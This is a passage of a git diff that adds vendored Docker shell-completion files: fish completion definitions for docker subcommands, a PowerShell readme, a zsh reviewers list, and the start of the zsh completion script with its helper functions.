+complete -c docker -f -n '__fish_docker_no_subcommand' -a port -d 'Lookup the public-facing port that is NAT-ed to PRIVATE_PORT'
+complete -c docker -A -f -n '__fish_seen_subcommand_from port' -l help -d 'Print usage'
+complete -c docker -A -f -n '__fish_seen_subcommand_from port' -a '(__fish_print_docker_containers running)' -d "Container"
+
+# pause
+complete -c docker -f -n '__fish_docker_no_subcommand' -a pause -d 'Pause all processes within a container'
+complete -c docker -A -f -n '__fish_seen_subcommand_from pause' -a '(__fish_print_docker_containers running)' -d "Container"
+
+# ps
+complete -c docker -f -n '__fish_docker_no_subcommand' -a ps -d 'List containers'
+complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s a -l all -d 'Show all containers. Only running containers are shown by default.'
+complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -l before -d 'Show only container created before Id or Name, include non-running ones.'
+complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s f -l filter -d 'Provide filter values. Valid filters:'
+complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -l help -d 'Print usage'
+complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s l -l latest -d 'Show only the latest created container, include non-running ones.'
+complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s n -d 'Show n last created containers, include non-running ones.'
+complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -l no-trunc -d "Don't truncate output"
+complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s q -l quiet -d 'Only display numeric IDs'
+complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -s s -l size -d 'Display total file sizes'
+complete -c docker -A -f -n '__fish_seen_subcommand_from ps' -l since -d 'Show only containers created since Id or Name, include non-running ones.'
+
+# pull
+complete -c docker -f -n '__fish_docker_no_subcommand' -a pull -d 'Pull an image or a repository from a Docker registry server'
+complete -c docker -A -f -n '__fish_seen_subcommand_from pull' -s a -l all-tags -d 'Download all tagged images in the repository'
+complete -c docker -A -f -n '__fish_seen_subcommand_from pull' -l help -d 'Print usage'
+complete -c docker -A -f -n '__fish_seen_subcommand_from pull' -a '(__fish_print_docker_images)' -d "Image"
+complete -c docker -A -f -n '__fish_seen_subcommand_from pull' -a '(__fish_print_docker_repositories)' -d "Repository"
+
+# push
+complete -c docker -f -n '__fish_docker_no_subcommand' -a push -d 'Push an image or a repository to a Docker registry server'
+complete -c docker -A -f -n '__fish_seen_subcommand_from push' -l help -d 'Print usage'
+complete -c docker -A -f -n '__fish_seen_subcommand_from push' -a '(__fish_print_docker_images)' -d "Image"
+complete -c docker -A -f -n '__fish_seen_subcommand_from push' -a '(__fish_print_docker_repositories)' -d "Repository"
+
+# rename
+complete -c docker -f -n '__fish_docker_no_subcommand' -a rename -d 'Rename an existing container'
+
+# restart
+complete -c docker -f -n '__fish_docker_no_subcommand' -a restart -d 'Restart a container'
+complete -c docker -A -f -n '__fish_seen_subcommand_from restart' -l help -d 'Print usage'
+complete -c docker -A -f -n '__fish_seen_subcommand_from restart' -s t -l time -d 'Number of seconds to try to stop for before killing the container. Once killed it will then be restarted. Default is 10 seconds.'
+complete -c docker -A -f -n '__fish_seen_subcommand_from restart' -a '(__fish_print_docker_containers running)' -d "Container"
+
+# rm
+complete -c docker -f -n '__fish_docker_no_subcommand' -a rm -d 'Remove one or more containers'
+complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -s f -l force -d 'Force the removal of a running container (uses SIGKILL)'
+complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -l help -d 'Print usage'
+complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -s l -l link -d 'Remove the specified link and not the underlying container'
+complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -s v -l volumes -d 'Remove the volumes associated with the container'
+complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -a '(__fish_print_docker_containers stopped)' -d "Container"
+complete -c docker -A -f -n '__fish_seen_subcommand_from rm' -s f -l force -a '(__fish_print_docker_containers all)' -d "Container"
+
+# rmi
+complete -c docker -f -n '__fish_docker_no_subcommand' -a rmi -d 'Remove one or more images'
+complete -c docker -A -f -n '__fish_seen_subcommand_from rmi' -s f -l force -d 'Force removal of the image'
+complete -c docker -A -f -n '__fish_seen_subcommand_from rmi' -l help -d 'Print usage'
+complete -c docker -A -f -n '__fish_seen_subcommand_from rmi' -l no-prune -d 'Do not delete untagged parents'
+complete -c docker -A -f -n '__fish_seen_subcommand_from rmi' -a '(__fish_print_docker_images)' -d "Image"
+
+# run
+complete -c docker -f -n '__fish_docker_no_subcommand' -a run -d 'Run a command in a new container'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s a -l attach -d 'Attach to STDIN, STDOUT or STDERR.'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l add-host -d 'Add a custom host-to-IP mapping (host:ip)'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s c -l cpu-shares -d 'CPU shares (relative weight)'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l cap-add -d 'Add Linux capabilities'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l cap-drop -d 'Drop Linux capabilities'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l cidfile -d 'Write the container ID to the file'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l cpuset -d 'CPUs in which to allow execution (0-3, 0,1)'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s d -l detach -d 'Detached mode: run the container in the background and print the new container ID'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l device -d 'Add a host device to the container (e.g. --device=/dev/sdc:/dev/xvdc:rwm)'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l dns -d 'Set custom DNS servers'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l dns-opt -d "Set custom DNS options (Use --dns-opt='' if you don't wish to set options)"
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l dns-search -d "Set custom DNS search domains (Use --dns-search=. if you don't wish to set the search domain)"
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s e -l env -d 'Set environment variables'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l entrypoint -d 'Overwrite the default ENTRYPOINT of the image'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l env-file -d 'Read in a line delimited file of environment variables'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l expose -d 'Expose a port or a range of ports (e.g. --expose=3300-3310) from the container without publishing it to your host'
+complete -c docker -A -f -n '__fish_seen_subcommand_from create' -l group-add -d 'Add additional groups to run as'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s h -l hostname -d 'Container host name'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l help -d 'Print usage'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s i -l interactive -d 'Keep STDIN open even if not attached'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l ipc -d 'Default is to create a private IPC namespace (POSIX SysV IPC) for the container'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l link -d 'Add link to another container in the form of <name|id>:alias'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s m -l memory -d 'Memory limit (format: <number>[<unit>], where unit = b, k, m or g)'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l mac-address -d 'Container MAC address (e.g. 92:d0:c6:0a:29:33)'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l memory-swap -d "Total memory usage (memory + swap), set '-1' to disable swap (format: <number>[<unit>], where unit = b, k, m or g)"
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l name -d 'Assign a name to the container'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l net -d 'Set the Network mode for the container'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s P -l publish-all -d 'Publish all exposed ports to random ports on the host interfaces'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s p -l publish -d "Publish a container's port to the host"
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l pid -d 'Default is to create a private PID namespace for the container'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l privileged -d 'Give extended privileges to this container'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l read-only -d "Mount the container's root filesystem as read only"
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l restart -d 'Restart policy to apply when a container exits (no, on-failure[:max-retry], always)'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l rm -d 'Automatically remove the container when it exits (incompatible with -d)'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l security-opt -d 'Security Options'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l sig-proxy -d 'Proxy received signals to the process (non-TTY mode only). SIGCHLD, SIGSTOP, and SIGKILL are not proxied.'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l stop-signal -d 'Signal to kill a container'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s t -l tty -d 'Allocate a pseudo-TTY'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s u -l user -d 'Username or UID'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l tmpfs -d 'Mount tmpfs on a directory'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s v -l volume -d 'Bind mount a volume (e.g., from the host: -v /host:/container, from Docker: -v /container)'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -l volumes-from -d 'Mount volumes from the specified container(s)'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -s w -l workdir -d 'Working directory inside the container'
+complete -c docker -A -f -n '__fish_seen_subcommand_from run' -a '(__fish_print_docker_images)' -d "Image"
+
+# save
+complete -c docker -f -n '__fish_docker_no_subcommand' -a save -d 'Save an image to a tar archive'
+complete -c docker -A -f -n '__fish_seen_subcommand_from save' -l help -d 'Print usage'
+complete -c docker -A -f -n '__fish_seen_subcommand_from save' -s o -l output -d 'Write to an file, instead of STDOUT'
+complete -c docker -A -f -n '__fish_seen_subcommand_from save' -a '(__fish_print_docker_images)' -d "Image"
+
+# search
+complete -c docker -f -n '__fish_docker_no_subcommand' -a search -d 'Search for an image on the registry (defaults to the Docker Hub)'
+complete -c docker -A -f -n '__fish_seen_subcommand_from search' -l automated -d 'Only show automated builds'
+complete -c docker -A -f -n '__fish_seen_subcommand_from search' -l help -d 'Print usage'
+complete -c docker -A -f -n '__fish_seen_subcommand_from search' -l no-trunc -d "Don't truncate output"
+complete -c docker -A -f -n '__fish_seen_subcommand_from search' -s s -l stars -d 'Only displays with at least x stars'
+
+# start
+complete -c docker -f -n '__fish_docker_no_subcommand' -a start -d 'Start a container'
+complete -c docker -A -f -n '__fish_seen_subcommand_from start' -s a -l attach -d "Attach container's STDOUT and STDERR and forward all signals to the process"
+complete -c docker -A -f -n '__fish_seen_subcommand_from start' -l help -d 'Print usage'
+complete -c docker -A -f -n '__fish_seen_subcommand_from start' -s i -l interactive -d "Attach container's STDIN"
+complete -c docker -A -f -n '__fish_seen_subcommand_from start' -a '(__fish_print_docker_containers stopped)' -d "Container"
+
+# stats
+complete -c docker -f -n '__fish_docker_no_subcommand' -a stats -d "Display a live stream of one or more containers' resource usage statistics"
+complete -c docker -A -f -n '__fish_seen_subcommand_from stats' -l help -d 'Print usage'
+complete -c docker -A -f -n '__fish_seen_subcommand_from stats' -l no-stream -d 'Disable streaming stats and only pull the first result'
+complete -c docker -A -f -n '__fish_seen_subcommand_from stats' -a '(__fish_print_docker_containers running)' -d "Container"
+
+# stop
+complete -c docker -f -n '__fish_docker_no_subcommand' -a stop -d 'Stop a container'
+complete -c docker -A -f -n '__fish_seen_subcommand_from stop' -l help -d 'Print usage'
+complete -c docker -A -f -n '__fish_seen_subcommand_from stop' -s t -l time -d 'Number of seconds to wait for the container to stop before killing it. Default is 10 seconds.'
+complete -c docker -A -f -n '__fish_seen_subcommand_from stop' -a '(__fish_print_docker_containers running)' -d "Container"
+
+# tag
+complete -c docker -f -n '__fish_docker_no_subcommand' -a tag -d 'Tag an image into a repository'
+complete -c docker -A -f -n '__fish_seen_subcommand_from tag' -s f -l force -d 'Force'
+complete -c docker -A -f -n '__fish_seen_subcommand_from tag' -l help -d 'Print usage'
+
+# top
+complete -c docker -f -n '__fish_docker_no_subcommand' -a top -d 'Lookup the running processes of a container'
+complete -c docker -A -f -n '__fish_seen_subcommand_from top' -l help -d 'Print usage'
+complete -c docker -A -f -n '__fish_seen_subcommand_from top' -a '(__fish_print_docker_containers running)' -d "Container"
+
+# unpause
+complete -c docker -f -n '__fish_docker_no_subcommand' -a unpause -d 'Unpause a paused container'
+complete -c docker -A -f -n '__fish_seen_subcommand_from unpause' -a '(__fish_print_docker_containers running)' -d "Container"
+
+# version
+complete -c docker -f -n '__fish_docker_no_subcommand' -a version -d 'Show the Docker version information'
+complete -c docker -A -f -n '__fish_seen_subcommand_from version' -s f -l format  -d 'Format the output using the given go template'
+complete -c docker -A -f -n '__fish_seen_subcommand_from version' -l help -d 'Print usage'
+
+# wait
+complete -c docker -f -n '__fish_docker_no_subcommand' -a wait -d 'Block until a container stops, then print its exit code'
+complete -c docker -A -f -n '__fish_seen_subcommand_from wait' -l help -d 'Print usage'
+complete -c docker -A -f -n '__fish_seen_subcommand_from wait' -a '(__fish_print_docker_containers running)' -d "Container"
diff --git a/vendor/github.com/docker/docker/contrib/completion/powershell/readme.txt b/vendor/github.com/docker/docker/contrib/completion/powershell/readme.txt
new file mode 100644
index 0000000000..18e1b53c13
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/completion/powershell/readme.txt
@@ -0,0 +1 @@
+See https://github.com/samneirinck/posh-docker
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/contrib/completion/zsh/REVIEWERS b/vendor/github.com/docker/docker/contrib/completion/zsh/REVIEWERS
new file mode 100644
index 0000000000..03ee2dde3d
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/completion/zsh/REVIEWERS
@@ -0,0 +1,2 @@
+Tianon Gravi <admwiggin@gmail.com> (@tianon)
+Jessie Frazelle <jess@docker.com> (@jfrazelle)
diff --git a/vendor/github.com/docker/docker/contrib/completion/zsh/_docker b/vendor/github.com/docker/docker/contrib/completion/zsh/_docker
new file mode 100644
index 0000000000..ecae826a4a
--- /dev/null
+++ b/vendor/github.com/docker/docker/contrib/completion/zsh/_docker
@@ -0,0 +1,2787 @@
+#compdef docker dockerd
+#
+# zsh completion for docker (http://docker.com)
+#
+# version:  0.3.0
+# github:   https://github.com/felixr/docker-zsh-completion
+#
+# contributors:
+#   - Felix Riedel
+#   - Steve Durrheimer
+#   - Vincent Bernat
+#
+# license:
+#
+# Copyright (c) 2013, Felix Riedel
+# All rights reserved.
+#
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions are met:
+#     * Redistributions of source code must retain the above copyright
+#       notice, this list of conditions and the following disclaimer.
+#     * Redistributions in binary form must reproduce the above copyright
+#       notice, this list of conditions and the following disclaimer in the
+#       documentation and/or other materials provided with the distribution.
+#     * Neither the name of the <organization> nor the
+#       names of its contributors may be used to endorse or promote products
+#       derived from this software without specific prior written permission.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
+# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+# DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
+# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+#
+
+# Short-option stacking can be enabled with:
+#  zstyle ':completion:*:*:docker:*' option-stacking yes
+#  zstyle ':completion:*:*:docker-*:*' option-stacking yes
+__docker_arguments() {
+    if zstyle -t ":completion:${curcontext}:" option-stacking; then
+        print -- -s
+    fi
+}
+
+__docker_get_containers() {
+    [[ $PREFIX = -* ]] && return 1
+    integer ret=1
+    local kind type line s
+    declare -a running stopped lines args names
+
+    kind=$1; shift
+    type=$1; shift
+    [[ $kind = (stopped|all) ]] && args=($args -a)
+
+    lines=(${(f)${:-"$(_call_program commands docker $docker_options ps --format 'table' --no-trunc $args)"$'\n'}})
+
+    # Parse header line to find columns
+    local i=1 j=1 k header=${lines[1]}
+    declare -A begin end
+    while (( j < ${#header} - 1 )); do
+        i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 ))
+        j=$(( i + ${${header[$i,-1]}[(i)  ]} - 1 ))
+        k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 ))
+        begin[${header[$i,$((j-1))]}]=$i
+        end[${header[$i,$((j-1))]}]=$k
+    done
+    end[${header[$i,$((j-1))]}]=-1 # Last column, should go to the end of the line
+    lines=(${lines[2,-1]})
+
+    # Container ID
+    if [[ $type = (ids|all) ]]; then
+        for line in $lines; do
+            s="${${line[${begin[CONTAINER ID]},${end[CONTAINER ID]}]%% ##}[0,12]}"
+            s="$s:${(l:15:: :::)${${line[${begin[CREATED]},${end[CREATED]}]/ ago/}%% ##}}"
+            s="$s, ${${${line[${begin[IMAGE]},${end[IMAGE]}]}/:/\\:}%% ##}"
+            if [[ ${line[${begin[STATUS]},${end[STATUS]}]} = Exit* ]]; then
+                stopped=($stopped $s)
+            else
+                running=($running $s)
+            fi
+        done
+    fi
+
+    # Names: we only display the one without slash. All other names
+    # are generated and may clutter the completion. However, with
+    # Swarm, all names may be prefixed by the swarm node name.
+    if [[ $type = (names|all) ]]; then
+        for line in $lines; do
+            names=(${(ps:,:)${${line[${begin[NAMES]},${end[NAMES]}]}%% *}})
+            # First step: find a common prefix and strip it (swarm node case)
+            (( ${#${(u)names%%/*}} == 1 )) && names=${names#${names[1]%%/*}/}
+            # Second step: only keep the first name without a /
+            s=${${names:#*/*}[1]}
+            # If no name, well give up.
+            (( $#s != 0 )) || continue
+            s="$s:${(l:15:: :::)${${line[${begin[CREATED]},${end[CREATED]}]/ ago/}%% ##}}"
+            s="$s, ${${${line[${begin[IMAGE]},${end[IMAGE]}]}/:/\\:}%% ##}"
+            if [[ ${line[${begin[STATUS]},${end[STATUS]}]} = Exit* ]]; then
+                stopped=($stopped $s)
+            else
+                running=($running $s)
+            fi
+        done
+    fi
+
+    [[ $kind = (running|all) ]] && _describe -t containers-running "running containers" running "$@" && ret=0
+    [[ $kind = (stopped|all) ]] && _describe -t containers-stopped "stopped containers" stopped "$@" && ret=0
+    return ret
+}
+
+__docker_complete_stopped_containers() {
+    [[ $PREFIX = -* ]] && return 1
+    __docker_get_containers stopped all "$@"
+}
+
+__docker_complete_running_containers() {
+    [[ $PREFIX = -* ]] && return 1
+    __docker_get_containers running all "$@"
+}
+
+__docker_complete_containers() {
+    [[ $PREFIX = -* ]] && return 1
+    __docker_get_containers all all "$@"
+}
+
+__docker_complete_containers_ids() {
+    [[ $PREFIX = -* ]] && return 1
+    __docker_get_containers all ids "$@"
+}
+
+__docker_complete_containers_names() {
+    [[ $PREFIX = -* ]] && return 1
+    __docker_get_containers all names "$@"
+}
+
+__docker_complete_info_plugins() {
+    [[ $PREFIX = -* ]] && return 1
+    integer ret=1
+    emulate -L zsh
+    setopt extendedglob
+    local -a plugins
+    plugins=(${(ps: :)${(M)${(f)${${"$(_call_program commands docker $docker_options info)"##*$'\n'Plugins:}%%$'\n'^ *}}:# $1: *}## $1: })
+    _describe -t plugins "$1 plugins" plugins && ret=0
+    return ret
+}
+
+__docker_complete_images() {
+    [[ $PREFIX = -* ]] && return 1
+    integer ret=1
+    declare -a images
+    images=(${${${(f)${:-"$(_call_program commands docker $docker_options images)"$'\n'}}[2,-1]}/(#b)([^ ]##) ##([^ ]##) ##([^ ]##)*/${match[3]}:${(r:15:: :::)match[2]} in ${match[1]}})
+    _describe -t docker-images "images" images && ret=0
+    __docker_complete_repositories_with_tags && ret=0
+    return ret
+}
+
+__docker_complete_repositories() {
+    [[ $PREFIX = -* ]] && return 1
+    integer ret=1
+    declare -a repos
+    repos=(${${${(f)${:-"$(_call_program commands docker $docker_options images)"$'\n'}}%% *}[2,-1]})
+    repos=(${repos#<none>})
+    _describe -t docker-repos "repositories" repos && ret=0
+    return ret
+}
+
+__docker_complete_repositories_with_tags() {
+    [[ $PREFIX = -* ]] && return 1
+    integer ret=1
+    declare -a repos onlyrepos matched
+    declare m
+    repos=(${${${${(f)${:-"$(_call_program commands docker $docker_options images)"$'\n'}}[2,-1]}/ ##/:::}%% *})
+    repos=(${${repos%:::<none>}#<none>})
+    # Check if we have a prefix-match for the current prefix.
+    onlyrepos=(${repos%::*})
+    for m in $onlyrepos; do
+        [[ ${PREFIX##${~~m}} != ${PREFIX} ]] && {
+            # Yes, complete with tags
+            repos=(${${repos/:::/:}/:/\\:})
+            _describe -t docker-repos-with-tags "repositories with tags" repos && ret=0
+            return ret
+        }
+    done
+    # No, only complete repositories
+    onlyrepos=(${${repos%:::*}/:/\\:})
+    _describe -t docker-repos "repositories" onlyrepos -qS : && ret=0
+
+    return ret
+}
+
+__docker_search() {
+    [[ $PREFIX = -* ]] && return 1
+    local cache_policy
+    zstyle -s ":completion:${curcontext}:" cache-policy cache_policy
+    if [[ -z "$cache_policy" ]]; then
+        zstyle ":completion:${curcontext}:" cache-policy __docker_caching_policy
+    fi
+
+    local searchterm cachename
+    searchterm="${words[$CURRENT]%/}"
+    cachename=_docker-search-$searchterm
+
+    local expl
+    local -a result
+    if ( [[ ${(P)+cachename} -eq 0 ]] || _cache_invalid ${cachename#_} ) \
+        && ! _retrieve_cache ${cachename#_}; then
+        _message "Searching for ${searchterm}..."
+        result=(${${${(f)${:-"$(_call_program commands docker $docker_options search $searchterm)"$'\n'}}%% *}[2,-1]})
+        _store_cache ${cachename#_} result
+    fi
+    _wanted dockersearch expl 'available images' compadd -a result
+}
+
+__docker_get_log_options() {
+    [[ $PREFIX = -* ]] && return 1
+
+    integer ret=1
+    local log_driver=${opt_args[--log-driver]:-"all"}
+    local -a awslogs_options fluentd_options gelf_options journald_options json_file_options logentries_options syslog_options splunk_options
+
+    awslogs_options=("awslogs-region" "awslogs-group" "awslogs-stream")
+    fluentd_options=("env" "fluentd-address" "fluentd-async-connect" "fluentd-buffer-limit" "fluentd-retry-wait" "fluentd-max-retries" "labels" "tag")
+    gcplogs_options=("env" "gcp-log-cmd" "gcp-project" "labels")
+    gelf_options=("env" "gelf-address" "gelf-compression-level" "gelf-compression-type" "labels" "tag")
+    journald_options=("env" "labels" "tag")
+    json_file_options=("env" "labels" "max-file" "max-size")
+    logentries_options=("logentries-token")
+    syslog_options=("env" "labels" "syslog-address" "syslog-facility" "syslog-format" "syslog-tls-ca-cert" "syslog-tls-cert" "syslog-tls-key" "syslog-tls-skip-verify" "tag")
+    splunk_options=("env" "labels" "splunk-caname" "splunk-capath" "splunk-format" "splunk-gzip" "splunk-gzip-level" "splunk-index" "splunk-insecureskipverify" "splunk-source" "splunk-sourcetype" "splunk-token" "splunk-url" "splunk-verify-connection" "tag")
+
+    [[ $log_driver = (awslogs|all) ]] && _describe -t awslogs-options "awslogs options" awslogs_options "$@" && ret=0
+    [[ $log_driver = (fluentd|all) ]] && _describe -t fluentd-options "fluentd options" fluentd_options "$@" && ret=0
+    [[ $log_driver = (gcplogs|all) ]] && _describe -t gcplogs-options "gcplogs options" gcplogs_options "$@" && ret=0
+    [[ $log_driver = (gelf|all) ]] && _describe -t gelf-options "gelf options" gelf_options "$@" && ret=0
+    [[ $log_driver = (journald|all) ]] && _describe -t journald-options "journald options" journald_options "$@" && ret=0
+    [[ $log_driver = (json-file|all) ]] && _describe -t json-file-options "json-file options" json_file_options "$@" && ret=0
+    [[ $log_driver = (logentries|all) ]] && _describe -t logentries-options "logentries options" logentries_options "$@" && ret=0
+    [[ $log_driver = (syslog|all) ]] && _describe -t syslog-options "syslog options" syslog_options "$@" && ret=0
+    [[ $log_driver = (splunk|all) ]] && _describe -t splunk-options "splunk options" splunk_options "$@" && ret=0
+
+    return ret
+}
+
+__docker_complete_log_drivers() {
+    [[ $PREFIX = -*  ]] && return 1
+    integer ret=1
+    drivers=(awslogs etwlogs fluentd gcplogs gelf journald json-file none splunk syslog)
+    _describe -t log-drivers "log drivers" drivers && ret=0
+    return ret
+}
+
+__docker_complete_log_options() {
+    [[ $PREFIX = -* ]] && return 1
+    integer ret=1
+
+    if compset -P '*='; then
+        case "${${words[-1]%=*}#*=}" in
+            (syslog-format)
+                syslog_format_opts=('rfc3164' 'rfc5424' 'rfc5424micro')
+                _describe -t syslog-format-opts "Syslog format Options" syslog_format_opts && ret=0
+                ;;
+            *)
+                _message 'value' && ret=0
+                ;;
+        esac
+    else
+        __docker_get_log_options -qS "=" && ret=0
+    fi
+
+    return ret
+}
+
+__docker_complete_detach_keys() {
+    [[ $PREFIX = -* ]] && return 1
+    integer ret=1
+
+    compset -P "*,"
+    keys=(${:-{a-z}})
+    ctrl_keys=(${:-ctrl-{{a-z},{@,'[','\\','^',']',_}}})
+    _describe -t detach_keys "[a-z]" keys -qS "," && ret=0
+    _describe -t detach_keys-ctrl "'ctrl-' + 'a-z @ [ \\\\ ] ^ _'" ctrl_keys -qS "," && ret=0
+}
+
+__docker_complete_pid() {
+    [[ $PREFIX = -* ]] && return 1
+    integer ret=1
+    local -a opts vopts
+
+    opts=('host')
+    vopts=('container')
+
+    if compset -P '*:'; then
+        case "${${words[-1]%:*}#*=}" in
+            (container)
+                __docker_complete_running_containers && ret=0
+                ;;
+            *)
+                _message 'value' && ret=0
+                ;;
+        esac
+    else
+        _describe -t pid-value-opts "PID Options with value" vopts -qS ":" && ret=0
+        _describe -t pid-opts "PID Options" opts && ret=0
+    fi
+
+    return ret
+}
+
+__docker_complete_runtimes() {
+    [[ $PREFIX = -*  ]] && return 1
+    integer ret=1
+
+    emulate -L zsh
+    setopt extendedglob
+    local -a runtimes_opts
+    runtimes_opts=(${(ps: :)${(f)${${"$(_call_program commands docker $docker_options info)"##*$'\n'Runtimes: }%%$'\n'^ *}}})
+    _describe -t runtimes-opts "runtimes options" runtimes_opts && ret=0
+}
+
+__docker_complete_ps_filters() {
+    [[ $PREFIX = -* ]] && return 1
+    integer ret=1
+
+    if compset -P '*='; then
+        case "${${words[-1]%=*}#*=}" in
+            (ancestor)
+                __docker_complete_images && ret=0
+                ;;
+            (before|since)
+                __docker_complete_containers && ret=0
+                ;;
+            (health)
+                health_opts=('healthy' 'none' 'starting' 'unhealthy')
+                _describe -t health-filter-opts "health filter options" health_opts && ret=0
+                ;;
+            (id)
+                __docker_complete_containers_ids && ret=0
+                ;;
+            (is-task)
+                _describe -t boolean-filter-opts "filter options" boolean_opts && ret=0
+                ;;
+            (name)
+                __docker_complete_containers_names && ret=0
+                ;;
+            (network)
+                __docker_complete_networks && ret=0
+                ;;
+            (status)
+                status_opts=('created' 'dead' 'exited' 'paused' 'restarting' 'running' 'removing')
+                _describe -t status-filter-opts "status filter options" status_opts && ret=0
+                ;;
+            (volume)
+                __docker_complete_volumes && ret=0
+                ;;
+            *)
+                _message 'value' && ret=0
+                ;;
+        esac
+    else
+        opts=('ancestor' 'before' 'exited' 'health' 'id' 'label' 'name' 'network' 'since' 'status' 'volume')
+        _describe -t filter-opts "Filter Options" opts -qS "=" && ret=0
+    fi
+
+    return ret
+}
+
+__docker_complete_search_filters() {
+    [[ $PREFIX = -* ]] && return 1
+    integer ret=1
+    declare -a boolean_opts opts
+
+    boolean_opts=('true' 'false')
+    opts=('is-automated' 'is-official' 'stars')
+
+    if compset -P '*='; then
+        case "${${words[-1]%=*}#*=}" in
+            (is-automated|is-official)
+                _describe -t boolean-filter-opts "filter options" boolean_opts && ret=0
+                ;;
+            *)
+                _message 'value' && ret=0
+                ;;
+        esac
+    else
+        _describe -t filter-opts "filter options" opts -qS "=" && ret=0
+    fi
+
+    return ret
+}
+
+__docker_complete_images_filters() {
+    [[ $PREFIX = -* ]] && return 1
+    integer ret=1
+    declare -a boolean_opts opts
+
+    boolean_opts=('true' 'false')
+    opts=('before' 'dangling' 'label' 'reference' 'since')
+
+    if compset -P '*='; then
+        case "${${words[-1]%=*}#*=}" in
+            (before|reference|since)
+                __docker_complete_images && ret=0
+                ;;
+            (dangling)
+                _describe -t boolean-filter-opts "filter options" boolean_opts && ret=0
+                ;;
+            *)
+                _message 'value' && ret=0
+                ;;
+        esac
+    else
+        _describe -t filter-opts "Filter Options" opts -qS "=" && ret=0
+    fi
+
+    return ret
+}
+
+__docker_complete_events_filter() {
+    [[ $PREFIX = -* ]] && return 1
+    integer ret=1
+    declare -a opts
+
+    opts=('container' 'daemon' 'event' 'image' 'label' 'network' 'type' 'volume')
+
+    if compset -P '*='; then
+        case "${${words[-1]%=*}#*=}" in
+            (container)
+                __docker_complete_containers && ret=0
+                ;;
+            (daemon)
+                emulate -L zsh
+                setopt extendedglob
+                local -a daemon_opts
+                daemon_opts=(
+                    ${(f)${${"$(_call_program commands docker $docker_options info)"##*$'\n'Name: }%%$'\n'^ *}}
+                    ${${(f)${${"$(_call_program commands docker $docker_options info)"##*$'\n'ID: }%%$'\n'^ *}}//:/\\:}
+                )
